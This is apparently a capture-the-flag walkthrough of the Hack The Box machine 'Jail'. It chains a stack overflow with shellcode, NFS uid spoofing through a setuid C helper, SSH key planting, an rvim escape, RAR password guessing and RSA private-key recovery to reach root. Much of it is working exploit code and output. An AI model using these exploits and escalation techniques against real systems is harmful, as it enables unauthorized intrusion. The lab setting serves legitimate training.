Jail (HTB)


OS: Linux
IP: 10.10.10.34

Nmap:-

root@kali:~/Desktop# nmap -sS -A 10.10.10.34

Starting Nmap 7.50 ( https://nmap.org ) at 2018-02-20 22:26 EST
Nmap scan report for 10.10.10.34
Host is up (0.17s latency).
Not shown: 996 filtered ports
PORT STATE SERVICE VERSION
22/tcp open ssh OpenSSH 6.6.1 (protocol 2.0)
| ssh-hostkey:
| 2048 cd:ec:19:7c:da:dc:16:e2:a3:9d:42:f3:18:4b:e6:4d (RSA)
| 256 af:94:9f:2f:21:d0:e0:1d:ae:8e:7f:1d:7b:d7:42:ef (ECDSA)
|_ 256 6b:f8:dc:27:4f:1c:89:67:a4:67:c5:ed:07:53:af:97 (EdDSA)
80/tcp open http Apache httpd 2.4.6 ((CentOS))
| http-methods:
|_ Potentially risky methods: TRACE
|_http-server-header: Apache/2.4.6 (CentOS)
|_http-title: Site doesn't have a title (text/html; charset=UTF-8).
111/tcp open rpcbind 2-4 (RPC #100000)
| rpcinfo:
| program version port/proto service
| 100000 2,3,4 111/tcp rpcbind
| 100000 2,3,4 111/udp rpcbind
| 100003 3,4 2049/tcp nfs
| 100003 3,4 2049/udp nfs
| 100005 1,2,3 20048/tcp mountd
| 100005 1,2,3 20048/udp mountd
| 100021 1,3,4 42049/tcp nlockmgr
| 100021 1,3,4 57851/udp nlockmgr
| 100024 1 50323/udp status
| 100024 1 57733/tcp status
| 100227 3 2049/tcp nfs_acl
|_ 100227 3 2049/udp nfs_acl
2049/tcp open nfs_acl 3 (RPC #100227)
Warning: OSScan results may be unreliable because we could not find at least 1 open and 1 closed port
Aggressive OS guesses: Linux 3.10 - 4.8 (91%), Linux 3.18 (91%), Linux 3.2 - 4.8 (91%), Crestron XPanel control system (89%), Linux
3.16 (88%), HP P2000 G3 NAS device (86%), ASUS RT-N56U WAP (Linux 3.4) (86%), Linux 3.1 (86%), Linux 3.2 (86%), AXIS 210A or 211
Network Camera (Linux 2.6.17) (86%)
No exact OS matches for host (test conditions non-ideal).
Network Distance: 2 hops

TRACEROUTE (using port 80/tcp)
HOP RTT ADDRESS
1 180.47 ms 10.10.14.1
2 180.52 ms 10.10.10.34

OS and Service detection performed. Please report any incorrect results at https://nmap.org/submit/ .
Nmap done: 1 IP address (1 host up) scanned in 43.29 seconds
root@kali:~/Desktop#

Web:-

The landing page has nothing useful, so let's brute-force directories.

root@kali:~/Desktop# gobuster -e -u http://10.10.10.34/ -t 500 -w /usr/share/dirbuster/wordlists/directory-list-2.3-medium.txt

Gobuster v1.2 OJ Reeves (@TheColonial)
=====================================================
[+] Mode : dir
[+] Url/Domain : http://10.10.10.34/
[+] Threads : 500
[+] Wordlist : /usr/share/dirbuster/wordlists/directory-list-2.3-medium.txt
[+] Status codes : 301,302,307,200,204
[+] Expanded : true
=====================================================
http://10.10.10.34/jailuser (Status: 301)
=====================================================
root@kali:~/Desktop#


There is a directory named /jailuser; let's open it and see what it holds.
It contains three files. Opening jail.c and reading through it, two things stand out: it has a hard-coded admin password (we don't yet know where it is used), and further down it listens on port 7411.
Let's connect to that port and see what service is running there.

root@kali:~/Desktop# nc -v 10.10.10.34 7411
10.10.10.34: inverse host lookup failed: Unknown host
(UNKNOWN) [10.10.10.34] 7411 (?) open
OK Ready. Send USER command.
DEBUG ON
OK DEBUG mode on.
USER admin
OK Send PASS command.
PASS 1974jialbreak!
Debug: userpass buffer @ 0xffffd610
Incorrect username and/or password.
ERR Authentication failed.
root@kali:~/Desktop#


Not quite a success: the password was mistyped (jialbreak), so authentication failed. What matters is what the server did anyway: with DEBUG on it printed the stack address of the userpass buffer before it checked the credentials, so the leak is available to anyone who can reach the port. Keep 0xffffd610 in mind; it comes back later.
After poking at ports 80 and 7411 for a while without finding more, let's turn to the remaining service from the nmap scan: rpcbind on port 111 advertises NFS (Network File System) on 2049 and mountd on 20048. Let's enumerate the exports.
First install the rpcbind and nfs-common packages so we can list and mount shares from Kali (skip this if you already have them):

root@kali:~/Desktop# apt-get install rpcbind nfs-common

Now run showmount against the target to list the exported directories.

root@kali:~/Desktop# showmount -e 10.10.10.34
Export list for 10.10.10.34:
/opt *
/var/nfsshare *
root@kali:~/Desktop#


As you can see, /opt and /var/nfsshare are exported to every client (*).
Before mounting, one detail about how NFSv3 decides access: with the default sec=sys authentication the server simply trusts the numeric uid and gid the client presents (only root is remapped to nobody by the default root_squash). Files owned by uid 1000 on the target (frank, as we will see) are therefore readable and writable by whichever local user happens to have uid 1000, whatever its name. So create a local user with uid 1000 (here teck) and do the NFS work as that user rather than as root.

teck@kali:/root/Desktop$ id
uid=1000(teck) gid=1000(teck) groups=1000(teck)
teck@kali:/root/Desktop$ sudo showmount -e 10.10.10.34
Export list for 10.10.10.34:
/opt *
/var/nfsshare *
teck@kali:/root/Desktop$ sudo mount -t nfs 10.10.10.34:/var/nfsshare /var/nfsshare/ -o nolock
mount.nfs: mount point /var/nfsshare/ does not exist
teck@kali:/root/Desktop$ sudo mkdir /var/nfsshare
teck@kali:/root/Desktop$ sudo mount -t nfs 10.10.10.34:/var/nfsshare /var/nfsshare/ -o nolock
teck@kali:/root/Desktop$ cd /opt/
teck@kali:/opt$ ls -l
total 0
drwxr-x--- 2 root root 26 Jun 26 2017 logreader
drwxr-xr-x 2 root root 6 Mar 26 2015 rh
teck@kali:/opt$ cd logreader/
teck@kali:/opt/logreader$ ls -la
total 4
drwxr-x--- 2 root root 26 Jun 26 2017 .
drwxr-xr-x 4 root root 33 Jun 25 2017 ..
-rwxr-x--- 1 root root 52 Jun 26 2017 logreader.sh
teck@kali:/opt/logreader$ cat logreader.sh
#!/bin/bash
/bin/cat /home/frank/logs/checkproc.log
teck@kali:/opt/logreader$ ./logreader.sh
/bin/cat: /home/frank/logs/checkproc.log: No such file or directory
teck@kali:/opt/logreader$


There is not much here: the script only cats /home/frank/logs/checkproc.log and nothing else.
After trying a lot of other things I went back to port 7411, this time typing the password correctly. Authentication succeeded, and sending OPEN returned "OK Jail doors opened", which at this point means nothing obvious.

teck@kali:/root/Desktop$ nc -v 10.10.10.34 7411
10.10.10.34: inverse host lookup failed: Unknown host
(UNKNOWN) [10.10.10.34] 7411 (?) open
OK Ready. Send USER command.
DEBUG ON
OK DEBUG mode on.
USER admin
OK Send PASS command.
PASS 1974jailbreak!
Debug: userpass buffer @ 0xffffd610
OK Authentication success. Send command.
OPEN
OK Jail doors opened.teck@kali:/root/Desktop$


Now we debug the C program from the web server: compile jail.c locally and run it under gdb.
Connect to it on localhost and send junk, preferably a long run of A's, in the password field to see whether the program crashes and whether the saved return address (EIP) is overwritten.
EIP is overwritten with our A's (0x41414141), so we control it.
Restart the program to find the exact offset. With pattern_create (gdb-peda's, judging by the crash value below) generate 50 bytes of cyclic pattern and send it as the password.
The program crashes with EIP = 0x413b4141; pattern_offset resolves that value. Sanity check: the bytes 41 41 3b 41 read back from little-endian are "AA;A", which sits 28 bytes into the peda pattern.
The offset is 28. Together with the buffer address leaked by DEBUG this is enough to write a Python exploit that returns into a NOP sled followed by shellcode and gives us a shell.
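As an added example (not code from the original write-up), here is the arithmetic behind the payload layout, in C: it takes the leaked buffer address 0xffffd610, the offset 28 and a 10-byte NOP sled, computes where the sled starts and which return address to use, assembles the bytes, and checks for bytes that would cut the password short. The shellcode array is the 50-byte exploit-db 34060 socket re-use shellcode used in the exploit on this page; the set of "bad" bytes (NUL, CR, LF) is an assumption about a line-oriented text protocol, not something the page states.

```c
/* payload_layout.c: added example, not the page's exploit. It reproduces the payload
 * arithmetic from the data collected in the write-up: the buffer address leaked by DEBUG
 * (0xffffd610), the EIP offset from pattern_offset (28), a 10-byte NOP sled and the
 * 50-byte socket re-use shellcode (exploit-db 34060).
 * Build and run stand-alone: gcc -o payload_layout payload_layout.c && ./payload_layout */
#include <stdint.h>
#include <stddef.h>
#include <stdio.h>
#include <string.h>

#define LEAKED_BUF 0xffffd610u  /* "Debug: userpass buffer @ 0xffffd610" */
#define EIP_OFFSET 28u          /* padding bytes before the saved return address */
#define SLED_LEN   10u

static const uint8_t SHELLCODE[] = {
    0x6a,0x02,0x5b,0x6a,0x29,0x58,0xcd,0x80,0x48,0x89,0xc6,0x31,0xc9,0x56,0x5b,0x6a,
    0x3f,0x58,0xcd,0x80,0x41,0x80,0xf9,0x03,0x75,0xf5,0x6a,0x0b,0x58,0x99,0x52,0x31,
    0xf6,0x56,0x68,0x2f,0x2f,0x73,0x68,0x68,0x2f,0x62,0x69,0x6e,0x89,0xe3,0x31,0xc9,
    0xcd,0x80
};
#define SHELLCODE_LEN (sizeof SHELLCODE)

/* The saved EIP sits at buf + eip_off; whatever follows it on the stack begins 4 bytes
 * later, so that is where the NOP sled starts. */
uint32_t sled_start(uint32_t buf, size_t eip_off)
{
    return buf + (uint32_t)eip_off + 4u;
}

/* Aim at the middle of the sled so a few bytes of stack movement either way still land
 * on a NOP. The page's 0xffffd638 is inside the sled as well: it is buf + 0x28 (40),
 * not buf + 28 decimal, which would be 0xffffd62c, the return-address slot itself. */
uint32_t ret_target(uint32_t buf, size_t eip_off, size_t sled_len)
{
    return sled_start(buf, eip_off) + (uint32_t)(sled_len / 2);
}

int target_in_sled(uint32_t ret, uint32_t buf, size_t eip_off, size_t sled_len)
{
    uint32_t lo = sled_start(buf, eip_off);
    return ret >= lo && ret < lo + (uint32_t)sled_len;
}

/* Bytes a line-oriented text protocol (or a C string copy) would stop at. The exact
 * terminators of the jail protocol are an assumption; PASS is clearly read as text. */
int has_bad_bytes(const uint8_t *p, size_t n)
{
    for (size_t i = 0; i < n; i++)
        if (p[i] == 0x00 || p[i] == 0x0a || p[i] == 0x0d)
            return 1;
    return 0;
}

/* [ 'A' * eip_off ][ ret, little-endian ][ 0x90 * sled_len ][ shellcode ]
 * Returns the payload length, or 0 if it does not fit in cap. */
size_t build_payload(uint8_t *out, size_t cap, size_t eip_off, uint32_t ret,
                     size_t sled_len, const uint8_t *sc, size_t sc_len)
{
    size_t need = eip_off + 4u + sled_len + sc_len;
    if (cap < need)
        return 0;
    memset(out, 'A', eip_off);
    out[eip_off + 0] = (uint8_t)(ret & 0xff);         /* x86 is little-endian */
    out[eip_off + 1] = (uint8_t)((ret >> 8) & 0xff);
    out[eip_off + 2] = (uint8_t)((ret >> 16) & 0xff);
    out[eip_off + 3] = (uint8_t)((ret >> 24) & 0xff);
    memset(out + eip_off + 4, 0x90, sled_len);
    memcpy(out + eip_off + 4 + sled_len, sc, sc_len);
    return need;
}

int main(void)
{
    uint8_t payload[256];
    uint32_t lo = sled_start(LEAKED_BUF, EIP_OFFSET);
    uint32_t ret = ret_target(LEAKED_BUF, EIP_OFFSET, SLED_LEN);
    size_t n = build_payload(payload, sizeof payload, EIP_OFFSET, ret, SLED_LEN,
                             SHELLCODE, SHELLCODE_LEN);

    printf("sled 0x%08x..0x%08x, ret 0x%08x, %zu bytes, bad bytes: %s\n",
           lo, lo + SLED_LEN - 1, ret, n, has_bad_bytes(payload, n) ? "yes" : "no");
    for (size_t i = 0; i < n; i++)
        printf("\\x%02x", payload[i]);
    putchar('\n');
    return 0;
}
```

Running it prints the sled range 0xffffd630..0xffffd639, the chosen return address 0xffffd635 and the 92-byte payload as a \x string that can be pasted into the Python exploit. The check that the return address really falls inside the sled, and that no NUL/CR/LF slipped into the bytes, is the part worth keeping when adapting this to another offset or shellcode.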

teck@kali:/root/Desktop$ cat jail.py
#!/usr/bin/env python
# Python 2 (print statement, str payloads), as run on the page.
import socket, telnetlib

s = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
s.connect(('10.10.10.34', 7411))

print s.recv(1024)              # OK Ready. Send USER command.
s.send("DEBUG")                 # debug mode makes the server print the buffer address
print s.recv(1024)              # OK DEBUG mode on.
s.send("USER admin")
print s.recv(1024)              # OK Send PASS command.

# Shellcode: https://www.exploit-db.com/exploits/34060/
# Linux/x86 - execve(/bin/sh) + Socket Re-Use Shellcode (50 bytes).
# It finds the client socket as dup(2)-1 (the highest open fd in the handling
# process), dup2()s it over fds 0, 1 and 2 and execs /bin//sh, so the shell
# answers over this very connection; no listener or reverse connection needed.
#
# Layout: 28 bytes of padding up to the saved return address (offset from
# pattern_offset), the new EIP, a 10-byte NOP sled, then the shellcode.
# The sled starts at buffer + 28 + 4 = 0xffffd630; 0xffffd638 (buffer + 0x28)
# points inside it. The buffer address is the one leaked by DEBUG and was the
# same on every connection to this target, which is why hard-coding it works.
payload = "A"*28 + "\x38\xd6\xff\xff" + "\x90"*10 + "\x6a\x02\x5b\x6a\x29\x58\xcd\x80\x48\x89\xc6\x31\xc9\x56\x5b\x6a\x3f\x58\xcd\x80\x41\x80\xf9\x03\x75\xf5\x6a\x0b\x58\x99\x52\x31\xf6\x56\x68\x2f\x2f\x73\x68\x68\x2f\x62\x69\x6e\x89\xe3\x31\xc9\xcd\x80"
s.send("PASS " + payload)
print s.recv(1024)              # Debug: userpass buffer @ 0xffffd610

# Hand the socket to telnetlib for an interactive session with the spawned shell.
t = telnetlib.Telnet()
t.sock = s
t.interact()

s.close()
teck@kali:/root/Desktop$


Save it, make it executable and run it; if everything lines up we get a shell.

root@kali:~/Desktop# ./jail.py
OK Ready. Send USER command.

OK DEBUG mode on.

OK Send PASS command.

Debug: userpass buffer @ 0xffffd610

id
uid=99(nobody) gid=99(nobody) groups=99(nobody) context=system_u:system_r:unconfined_service_t:s0
python -c 'import pty;pty.spawn("/bin/bash")'
bash-4.2$


We have a shell as nobody (uid 99). Let's see what sudo allows.

bash-4.2$ sudo -l
sudo -l
Matching Defaults entries for nobody on this host:
    !visiblepw, always_set_home, env_reset, env_keep="COLORS DISPLAY HOSTNAME
    HISTSIZE KDEDIR LS_COLORS", env_keep+="MAIL PS1 PS2 QTDIR USERNAME LANG
    LC_ADDRESS LC_CTYPE", env_keep+="LC_COLLATE LC_IDENTIFICATION
    LC_MEASUREMENT LC_MESSAGES", env_keep+="LC_MONETARY LC_NAME LC_NUMERIC
    LC_PAPER LC_TELEPHONE", env_keep+="LC_TIME LC_ALL LANGUAGE LINGUAS
    _XKB_CHARSET XAUTHORITY", secure_path=/sbin\:/bin\:/usr/sbin\:/usr/bin

User nobody may run the following commands on this host:
    (frank) NOPASSWD: /opt/logreader/logreader.sh
bash-4.2$ cd /opt/logreader
cd /opt/logreader
bash: cd: /opt/logreader: Permission denied
bash-4.2$


sudo lets nobody run /opt/logreader/logreader.sh as another user, frank, but nobody cannot even enter /opt/logreader, so that entry is of no direct use. Remember instead that /var/nfsshare is exported over NFS: our local user teck (uid 1000) can write into it, and the target sees whatever we put there as owned by uid 1000, i.e. frank.
So we write a small C program, teck.c (its source was shown as a screenshot in the original), that reads the file named on its command line. Compile it into the share as teck and set the setuid bit so that the target runs it with frank's uid; a plain executable bit would run it as nobody and fail on frank's files.
Now read the user flag from the nobody shell:

bash-4.2$ /var/nfsshare/teck /home/frank/user.txt
/var/nfsshare/teck /home/frank/user.txt
********************************

bash-4.2$


To get a proper shell as frank (and from there work toward root) we reuse the same trick, this time with a program that drops our SSH public key into frank's authorized_keys. First generate a key pair with no passphrase:

root@kali:~/.ssh# ssh-keygen
Generating public/private rsa key pair.
Enter file in which to save the key (/root/.ssh/id_rsa):
/root/.ssh/id_rsa already exists.
Overwrite (y/n)? y
Enter passphrase (empty for no passphrase):
Enter same passphrase again:
Your identification has been saved in /root/.ssh/id_rsa.
Your public key has been saved in /root/.ssh/id_rsa.pub.
The key fingerprint is:
SHA256:rMWxImLF1VPH3XOiisDxpBmVxexuQsSd9zMOJU9cNn4 root@kali
The key's randomart image is:
+---[RSA 2048]----+
| .+.Boo.o +o|
| . .o B =.+ Bo+|
| o. O.o . B oE|
| . =ooo. o = .|
| o . .oSo . o o |
| . . . +o + . |
| . o |
| |
| |
+----[SHA256]-----+
root@kali:~/.ssh# cat id_rsa.pub
ssh-rsa AAAAB3NzaC1yc2EAAAADAQABAAABAQDd8pdzDw0z7VHnPJOuD4juE7ZJe9hMRRjpf1wtl1EJuELElJuVlqtVgSjo4pCaXQ4t5FKA91SRVQOH/SZkBRe/UtVIV27Gl68CHogLl+jOd/spoMVgQk3HMSeua7iR5QxUKwxBgIcEun5bBPNT3tM+r66bbsuLurVZSuL2if2izphThB6vtPLa1dxZkbdtp0ZFcVMWVEcUzEJVcl2OrkO8w48BDC5Y/cZqf2Nz5ixVv14ap3er5tmk0RjT1o/9/pLqQW3ds1/VJTZLjO80fS0kSmysmkek755tg30AknrXQQsLxixd/krQrbNErbKPADpconAGjJDYstqCLhWN7wl5 root@kali
root@kali:~/.ssh#


root.c (again shown as a screenshot in the original) appends the public key above to /home/frank/.ssh/authorized_keys.
Compile it into the share, give it the same setuid permissions as the previous binary, and run /var/nfsshare/root from the nobody shell.
Before connecting over SSH, load the key into the agent (or pass it with -i); otherwise ssh falls back to asking for frank's password.
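The two helper programs above (teck.c for reading user.txt, root.c for planting the SSH key) were shown as screenshots in the original, so here is an added example that covers both steps with one program. It is a reconstruction, not the author's code, and frank_exec.c is a hypothetical name. It assumes what the page shows: the target is CentOS 7, frank is uid 1000/gid 1000, /var/nfsshare is exported read-write with sec=sys so files created by local uid 1000 arrive owned by 1000:1000, and setuid/setgid bits set from the client are honoured on the target's local filesystem. The program switches all three uids and gids to 1000 with setresuid/setresgid and execs whatever command follows on its command line, so the same binary reads user.txt and appends the key. Linking statically is an added precaution against glibc version differences between Kali and CentOS 7.

```c
/* frank_exec.c: hypothetical name; added example, not the author's teck.c or root.c.
 *
 * Assumptions (from the page): /var/nfsshare is exported read-write with sec=sys, frank is
 * uid 1000 / gid 1000 on the target, and we hold a shell as nobody (uid 99) there.
 * Build as the local uid-1000 user on Kali inside the mounted share, then mark it
 * set-user-ID and set-group-ID (the target sees the file as owned by 1000:1000):
 *
 *   gcc -static -o /var/nfsshare/frank_exec frank_exec.c
 *   chmod 6755 /var/nfsshare/frank_exec
 *
 * From the nobody shell on the target:
 *   /var/nfsshare/frank_exec /bin/cat /home/frank/user.txt
 *   /var/nfsshare/frank_exec /bin/sh -c 'mkdir -p -m 700 ~/.ssh && \
 *       echo "ssh-rsa AAAA... root@kali" >> ~/.ssh/authorized_keys && \
 *       chmod 600 ~/.ssh/authorized_keys'
 */
#define _GNU_SOURCE
#include <stdio.h>
#include <unistd.h>
#include <sys/types.h>

#define FRANK_UID 1000u
#define FRANK_GID 1000u

/* All three ids (real, effective, saved) must equal the target. If only the effective id
 * changed, bash would notice ruid != euid and drop the privilege again when we exec
 * /bin/sh -c, and a saved id of 99 would let the process switch back. */
int identity_is(uid_t want_uid, gid_t want_gid,
                uid_t ru, uid_t eu, uid_t su,
                gid_t rg, gid_t eg, gid_t sg)
{
    return ru == want_uid && eu == want_uid && su == want_uid &&
           rg == want_gid && eg == want_gid && sg == want_gid;
}

/* The setuid/setgid bits start us with euid/egid = suid/sgid = 1000 while ruid/rgid are
 * still nobody's 99. An unprivileged process may set each of its three ids to any of the
 * current three, so setres*id(1000, 1000, 1000) is permitted. Group first: once the uid
 * has changed we could no longer touch the gids. Supplementary groups stay nobody's
 * (clearing them needs CAP_SETGID); they only add access and do not matter here.
 * Returns 0 on success, -1 if any step failed (e.g. the binary is not setgid). */
int become_frank(void)
{
    uid_t ru, eu, su;
    gid_t rg, eg, sg;

    if (setresgid(FRANK_GID, FRANK_GID, FRANK_GID) != 0)
        return -1;
    if (setresuid(FRANK_UID, FRANK_UID, FRANK_UID) != 0)
        return -1;
    if (getresuid(&ru, &eu, &su) != 0 || getresgid(&rg, &eg, &sg) != 0)
        return -1;
    return identity_is(FRANK_UID, FRANK_GID, ru, eu, su, rg, eg, sg) ? 0 : -1;
}

int main(int argc, char **argv)
{
    if (argc < 2) {
        fprintf(stderr, "usage: %s <program> [args...]\n", argv[0]);
        return 2;
    }
    if (become_frank() != 0) {
        perror("could not switch to uid/gid 1000 (is the file setuid+setgid, owned by 1000:1000?)");
        return 1;
    }
    /* argv[1] should be an absolute path; execv() deliberately does not search PATH. */
    execv(argv[1], &argv[1]);
    perror("execv");
    return 1;
}
```

The check in become_frank is the part most often skipped in quick setuid helpers: without it a silent failure of setresgid (binary copied without the setgid bit, or the share mounted in a way that strips it) would leave the process running as nobody and the following exec would fail with a confusing permission error on frank's files.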

root@kali:~/Desktop# ssh-add
Identity added: /root/.ssh/id_rsa (/root/.ssh/id_rsa)
root@kali:~/Desktop# ssh frank@10.10.10.34
The authenticity of host '10.10.10.34 (10.10.10.34)' can't be established.
ECDSA key fingerprint is SHA256:i8ngSBp54+Lz0QCHj6yX+qsYfbMSY4mz5Gh3mNdb9HM.
Are you sure you want to continue connecting (yes/no)? yes
Warning: Permanently added '10.10.10.34' (ECDSA) to the list of known hosts.
[frank@localhost ~]$ id
uid=1000(frank) gid=1000(frank) groups=1000(frank) context=unconfined_u:unconfined_r:unconfined_t:s0-s0:c0.c1023
[frank@localhost ~]$ sudo -l
Matching Defaults entries for frank on this host:
    !visiblepw, always_set_home, env_reset, env_keep="COLORS DISPLAY HOSTNAME
    HISTSIZE KDEDIR LS_COLORS", env_keep+="MAIL PS1 PS2 QTDIR USERNAME LANG
    LC_ADDRESS LC_CTYPE", env_keep+="LC_COLLATE LC_IDENTIFICATION
    LC_MEASUREMENT LC_MESSAGES", env_keep+="LC_MONETARY LC_NAME LC_NUMERIC
    LC_PAPER LC_TELEPHONE", env_keep+="LC_TIME LC_ALL LANGUAGE LINGUAS
    _XKB_CHARSET XAUTHORITY", secure_path=/sbin\:/bin\:/usr/sbin\:/usr/bin

User frank may run the following commands on this host:
    (frank) NOPASSWD: /opt/logreader/logreader.sh
    (adm) NOPASSWD: /usr/bin/rvim /var/www/html/jailuser/dev/jail.c
[frank@localhost ~]$


Running sudo -l again as frank reveals a second entry: frank may run rvim on /var/www/html/jailuser/dev/jail.c as user adm without a password.
So open the file with sudo -u adm rvim /var/www/html/jailuser/dev/jail.c.
rvim is Vim in restricted mode, so :! and :shell are refused, but the restriction is not complete. Go to the last line and type :py import pty; pty.spawn('/bin/bash')
Then :diffpatch $(sh <&2 >&2), as in the original.
We end up with an sh prompt running as adm.


Searching as adm turned up a hidden directory .keys in /var/adm (owned by root:adm and readable by the adm group) containing a note.txt, a keys.rar and a hidden .local directory:

sh-4.2$ pwd
/var/adm
sh-4.2$ ls -la
total 4
drwxr-x---. 3 root adm 19 Jul 3 2017 .
drwxr-xr-x. 23 root root 4096 Feb 20 22:32 ..
drwxr-x---. 3 root adm 52 Jul 3 2017 .keys
sh-4.2$ cd .keys
sh-4.2$ ls -la
total 8
drwxr-x---. 3 root adm 52 Jul 3 2017 .
drwxr-x---. 3 root adm 19 Jul 3 2017 ..
-rw-r-----. 1 root adm 475 Jul 3 2017 keys.rar
drwxr-x---. 2 root adm 20 Jul 3 2017 .local
-rw-r-----. 1 root adm 154 Jul 3 2017 note.txt
sh-4.2$ cat keys.rar
[binary RAR data, not reproduced; the entry name rootauthorizedsshkey.pub is readable in the header]
sh-4.2$ cat note.txt
Note from Administrator:
Frank, for the last time, your password for anything encrypted must be your last name followed by a 4 digit number and a symbol.
sh-4.2$


The hidden .local directory contains a hidden file .frank with a message that looks like a simple substitution cipher. The online solver quipqiup recovers the plaintext:
Hahaha! Nobody will guess my new password! Only a few lucky souls have Escaped from Alcatraz alive like I did!!!


Now we need to get keys.rar over to the Kali machine. With only a shell on the target, base64 -w0 turns it into a single line we can copy:

sh-4.2$ cat keys.rar | base64 -w0
UmFyIRoHAM+QcwAADQAAAAAAAAALnXQkhEAAgAEAAMMBAAAD7rRLW0tk40odMxgApIEAAHJvb3RhdXRob3JpemVkc3Noa2V5LnB1YnI+qg+QiYZnpO86O3+rX46ki9CMd7+qCC09p9xDL5gF8Wgwc7mZK9wkiTpvXO4vmmM50barFVJi55jD3l9J8var5iMCb8+Lrpn2e79rXFKzktBJ2e3/cSLUZRSv33cQFk2+9b43PDDjUD6IQ6FVbjc72sy6/8bMu7k8MYtJWFRHsLTwIXi0ZMrd/vydVFq7vQiUPYbt7H0SscXY4crEf9ann9iQyl6V034tluMZ9VQ6DmkXk53ekSbb3/Ck5/1hb9qj2RpBQUNTW70fQIbDXjcOp+qKerl8cfpDdo7JDRZbmJBuYd5zgFEASKHrew3spqQ/gZrNO6m/VvI/ZUa6DTmqhguHYKC838c9JzzDmW52daeuPMZtdTz2B0Enz5eBdV2XLbofx6ZA3nIYco6DJMvU9NxOfaLgnTj/JWRVAgUjoEgQUdcyWDEWoDYh+ARbAfG+qyqRhF8ujgUqYWNbXY8FxMsrTPdcWGz8348OZsMWH9NS5S8/KeIoGZU1YhfpP/6so4ihWCnWxD17AEAHAA==sh-4.2$


Echo the string on Kali, decode it into a new file, and check that the decoded file looks like the original.

root@kali:~/Desktop# echo '<base64 string from above>' | base64 -d > keys.rar

root@kali:~/Desktop# cat keys.rar
[binary RAR data, identical to the original; rootauthorizedsshkey.pub visible in the header]
root@kali:~/Desktop#


file confirms a RAR v4 archive, so we can simply unrar it. The archive is password protected. The administrator's note fixes the shape (last name, four digits, a symbol) and the cipher message points at Alcatraz: Frank Morris escaped from Alcatraz in 1962, the story the film Escape from Alcatraz is based on, so the password is Morris1962!. Had the guess failed, that mask is small enough to brute-force: extract the hash with rar2john and run john with --mask='Morris?d?d?d?d?s'.

root@kali:~/Desktop# file keys.rar
keys.rar: RAR archive data, v4, os: Unix
root@kali:~/Desktop# unrar e keys.rar

UNRAR 5.40 freeware Copyright (c) 1993-2016 Alexander Roshal

Extracting from keys.rar

Enter password (will not be echoed) for rootauthorizedsshkey.pub:

Extracting rootauthorizedsshkey.pub OK
All OK
root@kali:~/Desktop# cat rootauthorizedsshkey.pub
-----BEGIN PUBLIC KEY-----
MIIBIDANBgkqhkiG9w0BAQEFAAOCAQ0AMIIBCAKBgQYHLL65S3kVbhZ6kJnpf072
YPH4Clvxj/41tzMVp/O3PCRVkDK/CpfBCS5PQV+mAcghLpSzTnFUzs69Ys466M//
DmcIo1pJGKy8LDrwdpsSjVmvSgg39nCoOYMiAUVF0T0c47eUCmBloX/K8QjId6Pd
D/qlaFM8B87MHZlW1fqe6QKBgQVY7NdIxerjKu5eOsRE8HTDAw9BLYUyoYeAe4/w
Wt2/7A1Xgi5ckTFMG5EXhfv67GfCFE3jCpn2sd5e6zqBoKlHwAk52w4jSihdzGAx
I85LArqOGc6QoVPS7jx5h5bK/3Oqm3siimo8O1BJ+mKGy9Owg9oZhBl28CfRyFug
a99GCw==
-----END PUBLIC KEY-----
root@kali:~/Desktop#


rootauthorizedsshkey.pub is not encrypted; it is an RSA public key in PEM form, and an odd one: the DER shows the second integer, the public exponent e, encoded with the same length (0x81 bytes) as the modulus, so e is roughly 1024 bits. An oversized e is the classic sign of a small private exponent d, which Wiener's continued-fraction attack recovers from the public key alone. RsaCtfTool tries that among other attacks and writes out the matching private key, which we can then use to SSH in as root.

root@kali:~/Downloads/RsaCtfTool-master# ./RsaCtfTool.py --publickey /root/Desktop/rootauthorizedsshkey.pub --private > /root/Desktop/id_rsa
root@kali:~/Downloads/RsaCtfTool-master# cd /root/Desktop/
root@kali:~/Desktop# chmod 400 id_rsa
root@kali:~/Desktop# ssh -i id_rsa root@10.10.10.34
[root@localhost ~]# id
uid=0(root) gid=0(root) groups=0(root) context=unconfined_u:unconfined_r:unconfined_t:s0-s0:c0.c1023
[root@localhost ~]# ls
root.txt
[root@localhost ~]# cat root.txt
********************************
[root@localhost ~]#

~ Hack the World and Stay Noob
